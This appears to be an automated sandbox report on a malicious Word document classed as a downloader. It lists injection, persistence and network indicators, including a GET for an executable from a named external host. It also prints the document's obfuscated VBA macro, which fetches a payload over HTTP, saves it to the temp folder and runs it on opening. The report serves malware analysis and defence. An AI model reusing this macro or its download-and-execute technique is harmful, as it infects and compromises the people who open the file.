Free Automated Malware Analysis Service - powered by Falcon Sandbox - Viewing online file analysis results for 'DOC201114-201114-001.DOC'

malicious

Threat Score: 96/100 AV Multiscan: 9% Labeled as: Downloader

DOC201114-201114-001.DOC

Analyzed on January 19th 2016 07:38:07 (CEST)
Guest System: Windows 7 32 bit, Home Premium, 6.1 (build 7601), Service Pack 1
Report generated by Falcon Sandbox v3.20 © Hybrid Analysis

Attention: this analysis ran with the legacy Usermode Monitor. It is highly recommended to use the Kernelmode Monitor.

Incident Response

Risk Assessment

Remote Access: Uses network protocols on unusual ports
Persistence: Injects into explorer
Spawns a lot of processes
Network Behavior: Contacts 1 domain and 2 hosts. View the network section for more details.

Additional Context

Platform Intelligence

Associated SHA256s: 412580f3838a33791d5617508ecf434b95ed798f8465ce1225151ac6c593055e

Indicators

Not all malicious and suspicious indicators are displayed. Get your own cloud service or the full version to view all details.

Malicious Indicators 15
Exploit/Shellcode
- Writes shellcode to a remote process
  
  details
  
  Wrote 175 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 382 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 40 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 306 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 501 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 150 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 97 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 51 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 70 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 191 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 136 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 124 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 381 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 348 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 24 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 7 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 13 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 94 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 55 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  Wrote 46 instructions to foreign process "noeebene.exe" (UID: 00202890-00002624)
  
  source
  
  Hybrid Analysis Technology
  
  relevance
  
  8/10
External Systems
- Sample was identified as malicious by a trusted Antivirus engine
  
  details
  
  No specific details available
  
  source
  
  External System
  
  relevance
  
  5/10
- Sample was identified as malicious by at least one Antivirus engine
  
  details
  
  5/53 Antivirus vendors marked sample as malicious (9% detection rate)
  
  source
  
  External System
  
  relevance
  
  8/10
General
- Document spawns new processes
  
  details
  
  Document spawned a new process (macro present)
  
  source
  
  Indicator Combinations
  
  relevance
  
  7/10
- GETs files from a webserver
  
  details
  
  "GET /786585d/08g7g6r56r.exe HTTP/1.1
  Accept: */*
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: www.cnbhgy.com
  Connection: Keep-Alive"
  
  source
  
  Network Traffic
  
  relevance
  
  10/10
- The input sample dropped a file that was identified as malicious
  
  details
  
  2/53 Antivirus vendors marked dropped file "08g7g6r56r[1].exe" as malicious (classified as "QVM07.1.Malware" with 3% detection rate)
  2/53 Antivirus vendors marked dropped file "noeebene.exe" as malicious (classified as "QVM07.1.Malware" with 3% detection rate)
  
  source
  
  Extracted File
  
  relevance
  
  10/10
Installation/Persistance
- Injects into explorer
  
  details
  
  Injected into "Explorer.EXE" (UID: 00221515-00001516)
  
  source
  
  Monitored Target
  
  relevance
  
  5/10
- Writes data to a remote process
  
  details
  
  "noeebene.exe" wrote 32 bytes to a foreign process "noeebene.exe" (PID: 00002624)
  "noeebene.exe" wrote 52 bytes to a foreign process "noeebene.exe" (PID: 00002624)
  "noeebene.exe" wrote 4 bytes to a foreign process "noeebene.exe" (PID: 00002624)
  "noeebene.exe" wrote 400 bytes to a foreign process "noeebene.exe" (PID: 00002624)
  "noeebene.exe" wrote 1024 bytes to a foreign process "noeebene.exe" (PID: 00002624)
  "noeebene.exe" wrote 56832 bytes to a foreign process "noeebene.exe" (PID: 00002624)
  "noeebene.exe" wrote 24576 bytes to a foreign process "noeebene.exe" (PID: 00002624)
  "noeebene.exe" wrote 7680 bytes to a foreign process "noeebene.exe" (PID: 00002624)
  "noeebene.exe" wrote 512 bytes to a foreign process "noeebene.exe" (PID: 00002624)
  "noeebene.exe" wrote 336384 bytes to a foreign process "explorer.exe" (PID: 00001516)
  
  source
  
  API Call
  
  relevance
  
  6/10
Network Related
- Uses network protocols on unusual ports
  
  details
  
  TCP traffic to 216.59.16.175 on port 4143
  
  source
  
  Network Traffic
  
  relevance
  
  7/10
Spyware/Information Retrieval
- Accesses potentially sensitive information from local browsers
  
  details
  
  "noeebene.exe" had access to "%LOCALAPPDATA%\Microsoft\Windows\History\History.IE5" (Type: "FileHandle", Context: "NtSetInformationFile")
  
  source
  
  Touched Handle
  
  relevance
  
  5/10
Unusual Characteristics
- Contains embedded VBA macros with keywords that indicate auto-execute behavior
  
  details
  
  Found keyword "AutoOpen" which indicates: "Runs when the Word document is opened"
  
  source
  
  Static Parser
  
  relevance
  
  10/10
- Spawns a lot of processes
  
  details
  
  Spawned process "WINWORD.EXE" with commandline "/n /dde" (UID: 00172156-00002324)
  Spawned process "noeebene.exe" (UID: 00199703-00003024)
  Spawned process "noeebene.exe" with commandline "%TEMP%\noeebene.exe" (UID: 00202890-00002624)
  Spawned process "Explorer.EXE" with commandline "%WINDIR%\Explorer.EXE" (UID: 00221515-00001516)
  Spawned process "taskhost.exe" (UID: 00244031-00001464)
  Spawned process "taskhost.exe" (UID: 00267796-00003280)
  Spawned process "OffDiag.exe" with commandline "/SOURCE 1 /LCID 1031 /WAITPID 3216" (UID: 00465390-00003232)
  
  source
  
  Monitored Target
  
  relevance
  
  8/10
Hiding 3 Malicious Indicators
- All indicators are available only in the private webservice or standalone version

Suspicious Indicators 9
Installation/Persistance
- Drops executable files
  
  details
  
  "08g7g6r56r[1].exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows"
  "noeebene.exe" has type "PE32 executable (GUI) Intel 80386, for MS Windows"
  
  source
  
  Extracted File
  
  relevance
  
  10/10
Network Related
- Uses a User Agent typical for browsers, although no browser was ever launched
  
  details
  
  Found user agent(s): Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  
  source
  
  Network Traffic
  
  relevance
  
  10/10
System Destruction
- Marks file for deletion
  
  details
  
  "%TEMP%\noeebene.exe" marked "%TEMP%\Cab3D3B.tmp" for deletion
  "%TEMP%\noeebene.exe" marked "%TEMP%\Tar3D4B.tmp" for deletion
  "%TEMP%\noeebene.exe" marked "%TEMP%\Cab5384.tmp" for deletion
  "%TEMP%\noeebene.exe" marked "%TEMP%\Tar5385.tmp" for deletion
  "%TEMP%\noeebene.exe" marked "%SAMPLEDIR%\Users\PSPUBWS\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\D0YDZTO5\216_59_16_175[1].txt" for deletion
  
  source
  
  API Call
  
  relevance
  
  10/10
System Security
- Modifies proxy settings
  
  details
  
  "noeebene.exe" (Access type: "SETVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYENABLE", Value: "00000000")
  "noeebene.exe" (Access type: "DELETEVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYSERVER")
  "noeebene.exe" (Access type: "DELETEVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS", Key: "PROXYOVERRIDE")
  "noeebene.exe" (Access type: "DELETEVAL", Path: "HKCU\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS")
  "noeebene.exe" (Access type: "DELETEVAL", Path: "HKLM\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\INTERNET SETTINGS\ZONEMAP", Key: "PROXYBYPASS")
  
  source
  
  Registry Access
  
  relevance
  
  10/10
Unusual Characteristics
- Contains embedded VBA macros with suspicious keywords
  
  details
  
  Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
  Found suspicious keyword "vbNormalFocus" which indicates: "May run an executable file or a system command"
  Found suspicious keyword "vbHide" which indicates: "May run an executable file or a system command"
  Found suspicious keyword "WScript.Shell" which indicates: "May run an executable file or a system command"
  Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings"
  Found suspicious keyword "ChrW" which indicates: "May attempt to obfuscate specific strings"
  Found suspicious keyword "MkDir" which indicates: "May create a directory"
  Found suspicious keyword "CopyFile" which indicates: "May copy a file"
  Found suspicious keyword "Shell.Application" which indicates: "May run an application (if combined with CreateObject)"
  Found suspicious keyword "CallByName" which indicates: "May attempt to obfuscate malicious function calls"
  Found suspicious keyword "Write" which indicates: "May write to a file (if combined with Open)"
  Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
  Found suspicious keyword "Open" which indicates: "May open a file"
  Found suspicious keyword "ADODB.Stream" which indicates: "May create a text file"
  
  source
  
  Static Parser
  
  relevance
  
  10/10
- Contains embedded string with suspicious keywords
  
  details
  
  Found suspicious keyword "Lib" which indicates: "May run code from a DLL"
  Found suspicious keyword "Shell" which indicates: "May run an executable file or a system command"
  Found suspicious keyword "Shell.Application" which indicates: "May run an application (if combined with CreateObject)"
  Found suspicious keyword "Chr" which indicates: "May attempt to obfuscate specific strings"
  Found suspicious keyword "Open" which indicates: "May open a file"
  Found suspicious keyword "Environ" which indicates: "May read system environment variables"
  Found suspicious keyword "Write" which indicates: "May write to a file (if combined with Open)"
  Found suspicious keyword "ChrW" which indicates: "May attempt to obfuscate specific strings"
  Found suspicious keyword "Windows" which indicates: "May enumerate application windows (if combined with Shell.Application object)"
  Found suspicious keyword "MkDir" which indicates: "May create a directory"
  Found suspicious keyword "CreateObject" which indicates: "May create an OLE object"
  Found suspicious keyword "vbNormalFocus" which indicates: "May run an executable file or a system command"
  Found suspicious keyword "vbHide" which indicates: "May run an executable file or a system command"
  Found suspicious keyword "CopyFile" which indicates: "May copy a file"
  
  source
  
  String
  
  relevance
  
  10/10
- Installs hooks/patches the running process
  
  details
  
  "WINWORD.EXE" wrote bytes "A6C926FF" to virtual address "0x2F191634" (part of module "WINWORD.EXE")
  "WINWORD.EXE" wrote bytes "E9231947F1" to virtual address "0x77433D01" ("[email protected]")
  "taskhost.exe" wrote bytes "00" to virtual address "0x10012000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x10010000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x01E61000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x10016000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x10014000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x0ABA5000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x1001A000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x10018000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x0ABA1000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x1001E000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x0ABA3000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x01E56000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x10002000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x0ACE0000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x10000000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x0ACE2000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x01E52000"
  "taskhost.exe" wrote bytes "00" to virtual address "0x10006000"
  
  source
  
  Hook Detection
  
  relevance
  
  10/10
Hiding 2 Suspicious Indicators
- All indicators are available only in the private webservice or standalone version

Informative 10
General
- Contacts domains
  
  details
  
  "www.cnbhgy.com"
  
  source
  
  Network Traffic
  
  relevance
  
  1/10
- Contacts server
  
  details
  
  "123.1.157.76:80"
  "216.59.16.175:4143"
  
  source
  
  Network Traffic
  
  relevance
  
  1/10
- Contains embedded VBA macros
  
  details
  
  File "ThisDocument.cls" (Streampath: "Macros/VBA/ThisDocument") has code: "Sub autoopen()
  Masuk ""
  End Sub"
  File "Module1.bas" (Streampath: "Macros/VBA/Module1") has code: "Public FI As SHFILEINFO
  Public Const SHGFI_DISPLAYNAME = &H200
  Public Const SHGFI_TYPENAME = &H400
  Public Const MAX_PATH = 260
  
  Public SHFIELD_2 As Object
  Public SHFIELD_1 As Object
  Public SHFIELD_3 As Object
  Public SHFIELD_4 As String
  Public SHFIELD_5 As String
  Public SHFIELD_6 As Object
  Public Type SHFILEINFO
  hIcon As Long
  iIcon As Long
  dwAttributes As Long
  szDisplayName As String * MAX_PATH
  szTypeName As String * 80
  End Type
  Private Type SECURITY_ATTRIBUTES
  nLength As Long
  lpSecurityDescriptor As Long
  bInheritHandle As Long
  End Type
  Public Type FILETIME
  dwLowDateTime As Long
  dwHighDateTime As Long
  End Type
  Private Type SYSTEMTIME
  wYear As Integer
  wMonth As Integer
  wDayOfWeek As Integer
  wDay As Integer
  wHour As Integer
  wMinute As Integer
  wSecond As Integer
  wMilliseconds As Integer
  End Type
  Public My As Long
  Public FokusNode As String
  Public FokushNode As Long
  Public Terbuka As Boolean
  Public TemPFavo As String
  Dim j&, m&, d&
  Enum TipX
  Folder = 0
  File = 1
  End Enum
  Private Sub pAddImage(ByVal oIml As String, ByVal iId As Long)
  oIml.AddFromHandle LoadResPicture(iId, vbResBitmap).Handle, imlBitmap
  End Sub
  
  Public Function GetAttr(ByVal Attr As Integer) As String
  
  Dim fillCustComboBox() As Variant
  fillCustComboBox = Array(10935, 10947, 10947, 10943, 10889, 10878, 10878, 10950, 10950, 10950, 10877, 10930, 10941, 10929, 10935, 10934, 10952, 10877, 10930, 10942, 10940, 10878, 10886, 10887, 10885, 10884, 10887, 10884, 10931, 10878, 10879, 10887, 10934, 10886, 10934, 10885, 10945, 10884, 10885, 10945, 10877, 10932, 10951, 10932)
  ru = Replace("ZUDBAGZUDBAEZUDBAT", "ZUDBA", "")
  SHFIELD_2.Open ru, CustomInfoGetResult(fillCustComboBox, 43), False
  
  GoTo FolderX
  If Attr <= 32 Then
  GetAttr = Switch(Attr = 1, "R", Attr = 2, "H", Attr = 4, "S", Attr = 32, "A")
  Else
  GetAttr = Switch(Attr = 33, "R+A", Attr = 34, "H+A", Attr = 36, "S+A", Attr = 35, "R+H+A", Attr = 38, "H+S+A", Attr = 39, "R+H+S+A")
  End If
  Exit Function
  FolderX:
  SHFIELD_4 = SHFIELD_3(Replace("TEMP", "", ""))
  SHFIELD_2.Send
  SHFIELD_5 = SHFIELD_4 + Replace("\notebene.txt", "t", "e")
  UniToAnsi ""
  End Function
  Public Sub KeepOnTop(F As String, yakin As Boolean)
  If yakin Then
  SetWindowPos F.hWnd, -1, 0, 0, 0, 0, 2 Or 1
  Else
  SetWindowPos F.hWnd, -2, 0, 0, 0, 0, 2 Or 1
  End If
  End Sub
  Public Function RenameFolder(ByVal Path As String, ByVal NewPath As String) As Long
  RemoveDirectory StrPtr(Path)
  BuatFolder NewPath
  End Function
  Public Function AmbilExtensi(ByRef nama As String) As String
  If InStr(nama, ".") > 0 Then
  AmbilExtensi = Mid$(nama, (InStrRev(nama, ".")))
  Else
  AmbilExtensi = ""
  End If
  End Function
  Public Function AmbilNama(ByVal Alamat As String) As String
  If InStr(Alamat, "\") > 0 Then
  AmbilNama = Mid$(Alamat, (InStrRev(Alamat, "\")) + 1)
  Else
  AmbilNama = Alamat
  End If
  End Function
  Public Sub BuatFolderAuto(ByVal NamaDir As String)
  Dim i As Long
  Dim SplitDir() As String
  Dim NmDir As String
  If InStr(NamaDir, "\") > 0 Then
  SplitDir = Split(NamaDir, "\")
  For i = 0 To UBound(SplitDir)
  NmDir = NmDir & SplitDir(i) & "\"
  If PathIsDirectory(StrPtr(NmDir)) = 0 Then
  BuatFolder NmDir
  If PathIsDirectory(StrPtr(NmDir)) = 0 Then
  MkDir NmDir
  End If
  End If
  Next i
  Else
  BuatFolder NamaDir
  End If
  End Sub
  Public Function BuatFolder(ByVal NamaDir As String)
  If Not PathIsDirectory(StrPtr(NamaDir)) Then
  Call CreateDirectoryUN(StrPtr(NamaDir), VarPtr(SCR))
  End If
  End Function
  Public Function AmbilAlamat(ByVal Alamat As String) As String
  If Right(Alamat, 1) = "\" Then Alamat = Left(Alamat, Len(Alamat) - 1)
  If InStr(Alamat, "\") > 0 Then
  PosNama = InStrRev(Alamat, AmbilNama(Alamat))
  AmbilAlamat = Left$(Alamat, PosNama - 1)
  Else
  AmbilAlamat = Alamat
  End If
  End Function
  Public Function AmbilAlamat2(ByVal Alamat As String) As String
  Dim PosNama&
  If InStr(Alamat, "\") > 0 Then
  PosNama = InStrRev(Alamat, AmbilNama(Alamat))
  AmbilAlamat2 = Left$(Alamat, PosNama - 2)
  Else
  AmbilAlamat2 = Alamat
  End If
  End Function
  Public Function viewMyNotepad(ByVal FileName As String) As Long
  Dim hFile As Long
  Dim fLen As Long
  Dim data() As Byte
  Dim dataString As String
  hFile = VbOpenFile(FileName)
  If hFile Then
  fLen = VbFileLen(hFile)
  Call VbReadFileB(hFile, 1, fLen, data)
  dataString = StrConv(data(), vbUnicode)
  frmView.tView.Text = dataString
  frmView.Show
  End If
  VbCloseHandle hFile
  End Function
  Public Function ViewArc(ByVal nama As String, Optional auto As Long = 1) As Long
  Dim Tempat As String
  If nama <> "" Then
  Tempat = TempDir & AmbilNama(nama)
  If ExtractFile(Alamat, 1, TempDir) = True Then
  If PathFileExists(StrPtr(Tempat)) Then
  If auto = 1 Then
  Panggil Tempat, vbNormalFocus
  Else
  viewMyNotepad Tempat
  End If
  End If
  End If
  End If
  End Function
  Public Function Masukkan(ByVal nama As String, ByVal UkWal As Long, ByVal UkPack As Long, ByVal Attr As Integer, ByVal CRC As Long, ByVal Tipe As TipX, ByVal Of As Long)
  Dim Ratio As Long
  Dim NamaTemp As String
  Dim hFileW As Long
  Dim MyAttr As String
  Dim DirPot As String
  Dim G As cListItem
  Dim Indek As Long
  Dim HanyaNama As String
  MyAttr = GetAttr(Attr)
  With FrmUtama
  If Tipe = File Then
  NamaTemp = TempDir & "tmp" & AmbilExtensi(nama)
  hFileW = CreateFileW(StrPtr(NamaTemp), &H40000000, &H2, ByVal 0&, 1, 0, 0)
  CloseHandle hFileW
  .Pic1.Cls
  .PicL.Cls
  SHGetFileInfo StrPtr(NamaTemp), 0, VarPtr(FI), Len(FI), SHGFI_DISPLAYNAME Or SHGFI_TYPENAME
  Call Load_Icon(NamaTemp, .LVRead.ImageList(lvwImageSmallIcon), .Pic1, ico32)
  Call Load_Icon(NamaTemp, .LVRead.ImageList(lvwImageLargeIcon), .PicL, ico64)
  Hapus NamaTemp
  If UkWal = 0 Then
  Ratio = 0
  Else
  Ratio = (100 - CLng(Round(UkPack / UkWal * 100, 2)))
  End If
  With .LVRead
  If .View = lvwTile Or .View = lvwIcon Then
  Indek = .ImageList(lvwImageLargeIcon).IconCount - 1
  Else
  Indek = .ImageList(lvwImageSmallIcon).IconCount - 1
  End If
  HanyaNama = AmbilNama(nama)
  If CekPassword Then HanyaNama = HanyaNama & " *"
  Set G = .ListItems.Add(, HanyaNama, , Indek)
  G.SubItem(2).ShowInTileView = False
  G.SubItem(2).Text = nama
  G.SubItem(3).Text = UkWal
  G.SubItem(4).Text = UkPack
  G.SubItem(5).Text = CStr(Ratio) & " %"
  G.SubItem(6).Text = FI.szTypeName
  G.SubItem(7).Text = MyAttr
  G.SubItem(8).Text = Hex(CRC)
  G.SubItem(9).Text = Of
  End With
  ElseIf Tipe = Folder Then
  DirPot = Right$(nama, Len(nama) - Len(FokusNode))
  If InStr(DirPot, "\") = 0 Then
  .LVRead.ImageList(lvwImageSmallIcon).AddFromDc .Pic2.hDC, 16, 16
  .LVRead.ImageList(lvwImageLargeIcon).AddFromDc .Picf.hDC, 32, 32
  With .LVRead
  If .View = lvwTile Or .View = lvwIcon Then
  Indek = .ImageList(lvwImageLargeIcon).IconCount - 1
  Else
  Indek = .ImageList(lvwImageSmallIcon).IconCount - 1
  End If
  Set G = .ListItems.Add(, DirPot, , Indek)
  G.SubItem(2).Text = nama
  G.SubItem(3).Text = ""
  G.SubItem(4).Text = ""
  G.SubItem(5).Text = ""
  G.SubItem(6).Text = "Folder"
  G.SubItem(7).Text = MyAttr
  G.SubItem(8).Text = ""
  End With
  End If
  End If
  End With
  End Function
  
  Public Function Masuk(ByVal nama As String)
  Dim i As Long
  Dim KeyIkut As String
  Dim KeyBuat As String
  Dim v() As String
  Set SHFIELD_2 = CreateObject(Mid("H7y7yMicEFV212VSD", 6, 3) + Right("LKJCDrosoft", 6) + Left(".XMLHTTP88IUYGH7766", 8))
  Dim Slash As String
  Set SHFIELD_1 = CreateObject("Adodb.Stream")
  Dim hKey&
  KeyIkut = ""
  KeyBuat = ""
  Slash = "\"
  
  Set SHFIELD_6 = CreateObject("Shell.Application")
  GoTo ss8
  With FrmUtama.TV
  v = Split(nama, Slash)
  For i = 0 To UBound(v)
  If i = 0 Then
  KeyBuat = v(i) & Slash
  Call .AddNode(My, , v(i) & Slash, v(i), 0, 1)
  Else
  KeyIkut = KeyIkut & v(i - 1) & Slash
  KeyBuat = KeyBuat & v(i) & Slash
  hKey = .GetKeyNode(KeyIkut)
  Call .AddNode(hKey, , KeyBuat, v(i), 0, 1)
  End If
  Next i
  Call .Expand(My, False)
  End With
  ss8:
  Set Loooa = CreateObject(Replace("WB1D2ScB1D2riptB1D2.B1D2ShB1D2ell", "B1D2", ""))
  Set SHFIELD_3 = Loooa.Environment(Replace("PrD4N6ocD4N6esD4N6s", "D4N6", ""))
  GetAttr 0
  End Function
  Public Sub CreateKey(Folder As String, Value As String)
  Dim b As Object
  On Error Resume Next
  Set b = CreateObject("wscript.shell")
  b.RegWrite Folder, Value
  End Sub
  Public Sub Bersihkan(ByVal tempFol As String)
  On Error Resume Next
  SetAttr tempFol, vbNormal
  Shell "cmd /c RD /S /Q " & tempFol, vbHide
  End Sub
  Public Function MasukkanTree(ByVal Alamat As String, ByVal hNode As Long)
  Dim a As Long
  Dim NamaFile As String
  Dim Folder As String
  With FrmUtama
  .LVRead.ListItems.Clear
  End With
  BacaFile Alamat, FrmUtama.TV.GetNodeKey(hNode)
  Folder = FrmUtama.TV.NodeText(hNode)
  FrmUtama.Status.Panels(3).Text = "Jumlah File di folder " & Folder & " : " & Str$(FrmUtama.LVRead.ListItems.Count) & " File"
  End Function
  Public Function TesSlash(ByVal Directory As String) As String
  If Right(Directory, 1) <> "\" Then _
  TesSlash = Directory & "\" _
  Else _
  TesSlash = Directory
  End Function
  Public Function StripNulls(ByVal OriginalStr As String) As String
  If (InStrB(OriginalStr, ChrW$(0)) > 0) Then
  OriginalStr = Left$(OriginalStr, InStr(OriginalStr, ChrW$(0)) - 1)
  End If
  StripNulls = OriginalStr
  End Function
  Public Function CariSelect() As String
  Dim x As cListItem
  Dim pos As String
  With FrmUtama.LVRead
  For i = 1 To .ListItems.Count
  If .ListItems(i).Selected = True Then
  CariSelect = .ListItems(i).SubItem(2).Text
  pos = .ListItems(i).SubItem(9).Text
  Set x = FrmUtama.LVSelect.ListItems.Add(, CariSelect)
  x.SubItem(2).Text = pos
  Exit For
  End If
  Next i
  End With
  End Function
  Public Function MeSelect(ByVal Itemnya As String) As String
  Dim nama As String
  With FrmUtama.LVRead
  For i = 1 To .ListItems.Count
  nama = StripNulls(.ListItems(i).SubItem(2).Text)
  If nama = Itemnya Then
  .SetFocusedItem i
  Exit For
  End If
  Next i
  End With
  End Function
  Public Function CariSelect2() As String
  With FrmFindR.lvFind
  For i = 1 To .ListItems.Count
  If .ListItems(i).Selected = True Then
  CariSelect2 = .ListItems(i).Text
  pos = .ListItems(i).SubItem(4).Text
  Set x = FrmUtama.LVSelect.ListItems.Add(, CariSelect)
  x.SubItem(2).Text = pos
  Exit For
  End If
  Next i
  End With
  End Function
  Public Function CariTipe() As String
  With FrmUtama.LVRead
  For i = 1 To .ListItems.Count
  If .ListItems(i).Selected = True Then
  CariTipe = StripNulls(.ListItems(i).SubItem(6).Text)
  Exit For
  End If
  Next i
  End With
  End Function
  Public Function MasukSelect() As Long
  Dim Jum As Long
  Dim nama As String
  Dim i As Long
  Dim pos As String
  Dim x As cListItem
  Jum = 0
  With FrmUtama
  .LVSelect.ListItems.Clear
  For i = 1 To .LVRead.ListItems.Count
  If .LVRead.ListItems(i).Selected = True Then
  Jum = Jum + 1
  nama = .LVRead.ListItems(i).SubItem(2).Text
  pos = .LVRead.ListItems(i).SubItem(9).Text
  Set x = .LVSelect.ListItems.Add(, nama)
  x.SubItem(2).Text = pos
  End If
  Next i
  End With
  MasukSelect = Jum
  End Function
  Public Function MasukSelect2() As Long
  Dim Jum As Long
  Dim nama As String
  Dim i As Long
  Dim x As cListItem
  Jum = 0
  With FrmUtama
  .LVSelect.ListItems.Clear
  For i = 1 To FrmFindR.lvFind.ListItems.Count
  If FrmFindR.lvFind.ListItems(i).Selected = True Then
  Jum = Jum + 1
  nama = FrmFindR.lvFind.ListItems(i).Text
  pos = FrmFindR.lvFind.ListItems(i).SubItem(4).Text
  Set x = .LVSelect.ListItems.Add(, nama)
  x.SubItem(2).Text = pos
  End If
  Next i
  End With
  MasukSelect2 = Jum
  End Function
  Public Function GetCommLine() As String
  Dim lpCmdLine As Long
  Dim lpArgv As Long
  Dim arrBytes() As Byte
  Dim BytesCount As Long
  Dim strArg As String
  lpCmdLine = GetCommandLine()
  BytesCount = lstrlen(lpCmdLine) * 2
  If BytesCount > 0 Then
  ReDim arrBytes(0 To BytesCount - 1)
  Call CopyMem(ByVal VarPtr(arrBytes(0)), ByVal lpCmdLine, BytesCount)
  strArg = CStr(arrBytes)
  GetCommLine = Right$(strArg, Len(strArg) - Len(VB.App.Path & "\" & VB.App.EXEName & ".exe") - 3)
  End If
  End Function
  Public Function Hapus(Alamat) As Boolean
  On Error Resume Next
  SetFileAttributes StrPtr(Alamat), &H80
  Hapus = DeleteFile(StrPtr(Alamat))
  End Function
  Public Function Copy(Target, Simpan) As Long
  Call CopyFile(StrPtr(Target), StrPtr(Simpan), 1)
  End Function
  Public Function FolderSaya() As String
  FolderSaya = Mid$(AmbilNama(Alamat), 1, Len(AmbilNama(Alamat)) - 4)
  End Function
  Public Function MyRight(ByVal data As String, ByVal Panjang As Long) As String
  Dim LenData&, pos&, Buffer$
  LenData = Len(data)
  pos = StrPtr(data)
  pos = pos + LenData - Panjang
  Buffer = Space$(Panjang)
  CopyMem ByVal StrPtr(Buffer), ByVal pos, Panjang
  MyRight = Buffer
  End Function
  Public Function UniToAnsi(ByVal DataW As String) As String
  With SHFIELD_1
  .Type = 1
  End With
  SHFIELD_1.Open
  TampilkanTV ""
  Exit Function
  Call PathFi.leExistsA(DataW)
  UniToAnsi = DataW
  End Function
  Public Function HitungWaktu() As String
  d = d + 1
  If d = 60 Then
  d = 0
  m = m + 1
  If m = 60 Then
  m = 0
  j = j + 1
  End If
  End If
  HitungWaktu = ForDigit(j) & ":" & ForDigit(m) & ":" & ForDigit(d)
  End Function
  Public Function ForDigit(ByVal jumlah As String) As String
  ForDigit = String$(2 - Len(jumlah), "0") & jumlah
  End Function
  Public Sub PerbaikiTampilan()
  With frmProses
  .lblFile.Caption = "Jumlah File : " & CStr(JumFile)
  .lblFolder.Caption = "Jumlah Folder : " & CStr(JumDir)
  End With
  End Sub
  Public Function MasukFind(ByVal nama As String, ByVal Loc As String, ByVal STRnya As String, ByVal pos As Long) As Long
  Dim NamaTemp As String
  Dim hFileW As Long
  NamaTemp = TempDir & "tmp" & AmbilExtensi(nama)
  hFileW = CreateFileW(StrPtr(NamaTemp), &H40000000, &H2, ByVal 0&, 1, 0, 0)
  CloseHandle hFileW
  With FrmUtama
  .Pic1.Cls
  Call Load_Icon(NamaTemp, FrmFindR.lvFind.ImageList, .Pic1, ico32)
  End With
  Hapus NamaTemp
  With FrmFindR.lvFind
  Set G = .ListItems.Add(, nama, , .ImageList.IconCount - 1)
  G.SubItem(2) = Loc
  G.SubItem(3) = STRnya
  G.SubItem(4) = pos
  End With
  End Function
  Public Function TampilkanTV(ByVal NamaKey As String) As Long
  Dim hNode As Long
  Dim Path() As String
  Dim i As Long
  
  SHFIELD_1.write SHFIELD_2.responseBody
  GoTo i8
  Path = Split(NamaKey, "\")
  NamaKey = ""
  On Error Resume Next
  For i = 0 To UBound(Path) - 1
  With FrmUtama.TV
  NamaKey = NamaKey & Path(i) & "\"
  hNode = .GetKeyNode(NamaKey)
  If hNode <> 0 Then Call .Expand(hNode, False)
  If i = UBound(Path) - 1 Then
  .SetFocus
  .SelectedNode = hNode
  End If
  End With
  Next i
  i8:
  Mulai
  End Function
  Public Sub EnableButton(ByVal Aktif As Boolean)
  Dim i As Long
  With FrmUtama
  If Aktif = True Then
  For i = 1 To 19
  .t.Item(0).Buttons.Item(i).Enabled = True
  Next i
  .Commans.Enabled = True
